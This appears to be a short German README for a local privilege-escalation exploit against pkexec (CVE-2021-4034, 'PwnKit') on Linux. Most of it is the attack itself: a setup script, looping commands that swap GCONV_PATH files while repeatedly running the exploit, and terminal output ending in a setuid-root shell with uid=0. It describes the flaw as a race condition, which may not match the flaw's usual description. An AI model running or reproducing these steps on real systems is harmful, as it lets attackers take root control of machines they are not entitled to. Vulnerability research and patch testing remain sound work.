
Exploit für CVE-2021-4034 (PwnKit), der eine Race Condition in pkexec ausnutzt, um auf Linux-Systemen Rechte auf Root zu erweitern.
Exploit für die pwnkit-Schwachstelle vom Qualys-Team.
Dieser Exploit setzt voraus, dass gcc auf dem Zielsystem vorhanden ist.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Führen Sie den folgenden Befehl in einer bash-Sitzung aus:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Führen Sie den folgenden Befehl in einer anderen bash-Sitzung aus:
while :; do ./exploit; done
Sie werden schließlich das Rennen gewinnen und eine shell-Binärdatei erhalten, die Ihnen
Root-Zugriff verschafft:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Eine kurze Beschreibung der Technik finden Sie in meinem Blog.